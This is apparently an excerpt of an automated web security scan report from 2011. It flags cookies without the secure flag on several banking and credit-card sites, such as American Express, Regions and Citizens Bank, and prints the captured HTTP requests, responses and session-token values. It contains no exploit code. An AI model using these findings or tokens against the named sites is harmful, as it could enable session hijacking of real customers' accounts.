HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Thu, 03 Feb 2011 15:55:00 GMT Content-type: text/html;charset=ISO-8859-1 Cache-control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Set-cookie: JSESSIONID=03568F1802F7F86AA5F163DABD5F16ED;Path=/ Set-cookie: language=en;Path=/ Set-cookie: language=en;Path=/ Connection: close Set-Cookie: NSC_ttm-dpotvnfsdbsebddftt=ffffffffc3a0626e45525d5f4f58455e445a4a4233c1;path=/;secure
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ca/mkca.aspx HTTP/1.1 Host: www.morgankeegan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Connection: close Date: Thu, 03 Feb 2011 15:55:15 GMT Content-Length: 17005 Content-Type: text/html; charset=utf-8 X-Powered-By: Morgan Keegan Ingenuity X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: ASP.NET_SessionId=r0mds0551s2n1suardxkio2o; path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML lang="en"> <HEAD> <title>Client Access :: Morgan Keegan</title> <META h ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /regions/ HTTP/1.1 Host: www.planservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Expires: 01 Nov 1990 01:00:01 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml Set-Cookie: TESTCOOKIES=Test;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: CFID=48347521;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: CFTOKEN=16733687;expires=Sat, 26-Jan-2041 15:50:37 GMT;path=/ Set-Cookie: JSESSIONID=0430c25d29c2403f45f2TR;path=/ Set-Cookie: PLANID=;path=/ Set-Cookie: GROUPID=;path=/ Set-Cookie: IID=;path=/ Set-Cookie: WEBUSAGE=105037;path=/ Set-Cookie: USERINTERNAL=0;path=/ Set-Cookie: VIRTDIR=regions;path=/ Date: Thu, 03 Feb 2011 15:50:36 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personal_banking.rf HTTP/1.1 Host: www.regions.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: www.regions.com-http=R1402660298
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /regions/index.cfm HTTP/1.1 Host: www.sponsorinsight.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /portal/server.pt?space=CommunityPage&control=SetCommunity&PageID=0&CommunityID=305&cid=PS-PSRC-RT-BING-00033319 HTTP/1.1 Host: www.suntrust.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:pt="http://www.plumtree.com/xmlschemas/ptui/"> <!-- This page uses the base page layo ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cards/benefits/ HTTP/1.1 Host: www124.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:13:21 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742401135944; path=/; expires=Sun, 07-Feb-16 14:13:21 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000TKqZC3FBtwwLR7ggzow9W6Y:vh7pui00;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33942
<!-- AMU Integration Imports -->
<HTML> <HEAD> <TITLE>Credit Card Services & Benefits - Credit Card Protection | American Express</TITLE> <META name="description" content="In addition to the excl ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099864083; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001tRlF96bogoCEk-GWeNUtldM:11m137ri1;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/DecodeServlet HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000sCj6t9Hna1rccUoRjq-IM24:10ue6mp18;Path=/ Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 0 Connection: close Content-Type: text/html Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /secure/my-special-offers HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:16 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000I-vPqmYD-VFlGwhjjEv6j4o:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 60273
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smsweb/un_Landing.do HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0001CVQ7-fOs0FkadFJVEKHB1-6:11m1380s8; SaneID=173.193.214.243-1296742163652146; SIFR-PREFETCHED=true;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:26:17 GMT Server: IBM_HTTP_Server Set-Cookie: JSESSIONID=0000sVlsrVbPIB1cvLVnVyWfqn8:11nugl6hc;Path=/ Set-Cookie: JSESSIONID=0000eNOeOQ3Hspgrd77PseRgXZw:11nugl6hc;Path=/ Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000TzQ53Y5cTtY7bAicAgzlKan:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:26 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000bW6uKYN7VFONJWqjrLhrVkp:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do?vgnextoid=2621c0f7c5a4c110VgnVCM100000defaad94RCRD&inav=footer_fraud_protection_center HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:27 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000JPI55sd8KNdx8lYTMy7brTn:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 38887
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Fraud Protection Center</title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement&inav=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:29 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000WljRBDsQJbtD5N0xFge7RAb:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalcards.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:33 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00007MfRqAecrEgPk7WMB6uziyX:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do?vgnextoid=bbf185df62df5210VgnVCM100000defaad94RCRD&source=footer_card_agreements&inav=footer_card_agreements HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:35 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000Veb0ftG4-cYW9OOkY_veomE:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 57019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:29 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742109740701; path=/; expires=Sun, 07-Feb-16 14:08:29 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000F5wGIYVCO3uWBH-xeaFC48P:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do?isFlash=true&inav=menu_business_openhome HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:37 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000akSHbW6x5an_FsyrXyIdKqc:14t0oisgo; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:37 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000pVlv_8Ac9oFOFXNUhnegkUT:15bnmhi21; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 35522
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "_http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:42 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000X-wkKOi7UbYQfITKmK7Vy0B:1563unest; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:41 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=0000NxGEMtoG1S-LUW_HX7nWKW2:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 14:08:40 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000DOIuP81S4K5SAYluhZy6Q1L:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/default.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/enter-password-help.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/invalidate.jsp HTTP/1.1 Host: www3.citizensbankonline.com Connection: keep-alive Referer: https://www3.citizensbankonline.com/efs/servlet/efs/login.jsp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/login.jsp HTTP/1.1 Host: www3.citizensbankonline.com Connection: keep-alive Referer: https://www3.citizensbankonline.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/secure-login-help.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /efs/servlet/efs/wait.jsp HTTP/1.1 Host: www3.citizensbankonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000zIMvG4AcqipG-ii33a-kirx:1475b8i2o;
The following cookie was issued by the application and does not have the secure flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num= HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&_dc_ck=try Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:53 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Thu, 03 Feb 2011 13:17:53 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /consumertravel/travel.do?a=travel-offers&us_nu=subtab&inav=menu_travel_viewoffers HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
yut=172.17.12.125.48721296759884519; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yodlee_index.html HTTP/1.1 Host: easyview.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:04:44 GMT Vary: User-Agent Set-Cookie: yut=172.17.12.125.48721296759884519; path=/ Last-Modified: Tue, 19 Jan 2010 08:24:12 GMT ETag: "3a9d85-2a1b-4b556c2c" Accept-Ranges: bytes Content-Length: 10779 Connection: close Content-Type: text/html
<html> <head> <meta name=description content="EasyView enables consumers to aggregate, manage, and access all their personal accounts - bank balances, investments, bills, email, travel reservations, s ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
www.regions.com-ssl=R1791168303; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regions/enes/24/_ HTTP/1.1 Host: espanol.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Thu, 03 Feb 2011 15:51:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Connection: close Set-Cookie: www.regions.com-ssl=R1791168303; path=/ Content-Type: text/html;charset=iso-8859-1 Content-Length: 2741
<!DOCTYPE html PUBliC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="es"> <head>
rfaft2c1_.regions.com_%2F_wlf=TlNDX2Z5cXNmdHRzamhpdW1kLnNmaGpwb3QuZHBuLXdqcV9f?eqACuPgwQKiYA4fAAbwNJxQyR+gA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /icc HTTP/1.1 Host: expresstradelc.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://expresstradelc.regions.com/icc/">here</a></body>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?locale=en-US&productkey=wlsearchweb&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington%2c+District+Of+Columbia&P7=Original&P8=&P9=38.9069%2f-77.0284&P10=24902&P11=&P12=&searchtype=Web+Search&optl1=1&backurl=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU HTTP/1.1 Host: feedback.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Thu, 03 Feb 2011 13:45:05 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=bingweb&brand=&&locale=en-US&P1=dsathome&P2=&P3=0&P4=NOFORM&P5=DC63BAA44C3843F38378B4BB213E0A6F&P6=Washington, District Of Columbia&P7=Original&P8=&P9=38.9069/-77.0284&P10=24902&P11=&P12=&searchtype=Web Search&optl1=1&backurl=http://www.bing.com:80/?FORM=FEEDTU Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%3a80%2f%3fFORM%3dFEEDTU; expires=Thu, 03-Feb-2011 14:45:05 GMT; path=/ Set-Cookie: LNG=feedback.live.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Set-Cookie: MSIDCookie=778b4fbd-2db4-4fa4-a996-44ac5969587d; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 522
